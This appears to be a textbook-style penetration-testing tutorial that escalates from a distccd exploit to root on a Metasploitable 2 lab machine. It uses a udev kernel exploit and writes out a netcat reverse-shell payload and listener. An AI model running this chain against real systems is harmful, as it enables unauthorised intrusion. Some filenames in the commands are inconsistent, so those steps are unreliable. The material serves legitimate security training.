Local escalation

In this section, we are going to use a local exploit to escalate our privilege.

To demonstrate this, we will use the following virtual machines:

  • Metasploitable 2 as our victim machine
  • Kali Linux as our attacking machine

First, we will identify the open network services available on the victim machine. For this, we utilize the Nmap port scanner with the following command:

nmap -p-

We configure Nmap to scan for all of the ports (from port 1 to port 65,535) using the -p- option.

The following screenshot shows the brief result of the preceding command:

After doing some research on the internet, we found that the distccd service has a vulnerability that may allow a malicious user to execute arbitrary commands. The distccd service is used to scale large compiler jobs across a farm of similarly-configured systems.

Next, we search in Metasploit to find whether it has the exploit for this vulnerable service:

From the preceding screenshot, we can see that Metasploit has the exploit for the vulnerable distccd service.

Let's try to exploit the service, as shown in the following screenshot:

We are able to exploit the service and issue an operating system command to find our privilege: daemon.

The next step is to explore the system to get more information about it. Now, let's see the kernel version used by issuing the following command:

uname -r
The kernel version used is 2.6.24-16-server.

We searched the exploit-db database and found an exploit (http://www.exploit-db.com/exploits/8572/) that will allow us to escalate our privilege to root. We then conduct a search of the Kali Linux exploit using the term udev, which matches the exploit in the exploit-db webpage, using the following command:

searchsploit udev

This command produces the following output:

Next, we need to get this exploit from our attacking machine to the compromised machine. We can do this using the compromised machine's wget command. First, we transfer the exploit to the folder on our machine where the compromised machine will look for the file. Use the command line to copy the exploit by typing the following:

cp /usr/share/exploitdb/platforms/linux/local/857s.c /var/www/html

Next, make sure the apache2 server is running by typing this:

service apache2 start

We can download the exploit from our attacking machine using the wget command on the compromised machine, which looks for the file in the attacking machine's /var/www/html folder:

After successfully downloading the exploit, we compile it on the victim machine using the following gcc command:

gcc 8572.c -o 8572

Now our exploit is ready to be used. From the source code, we found that this exploit needs the Process Identifier (PID) of the udevd netlink socket as the argument. We can get this value by issuing the following command:

cat /proc/net/netlink

The following screenshot shows the result of this command:

You can also get the udev service PID, 1, by issuing the following command:

ps aux | grep udev

The following command-line screenshot is the result of the preceding command:

In a real penetration-testing engagement, you may want to set up a test machine that has the same kernel version as the target to test the exploit.

From our information-gathering on the victim machine, we know that this machine has Netcat installed. We will use Netcat to connect back to our machine once the exploit runs in order to give us root access to the victim machine. Based on the exploit source code information, we need to save our payload in a file called run:

echo '#!/bin/bash' > run echo '/bin/netcat -e /bin/bash 31337' >> run

We also need to start the Netcat listener on our attacking machine by issuing the following command:

nc -vv -l -p 31337

The one thing left to do is to run the exploit with the required argument:

./8512.c 2675

In our attacking machine, we can see the following messages:

After issuing the whoami command, we can see that we have successfully escalated our privilege to root.

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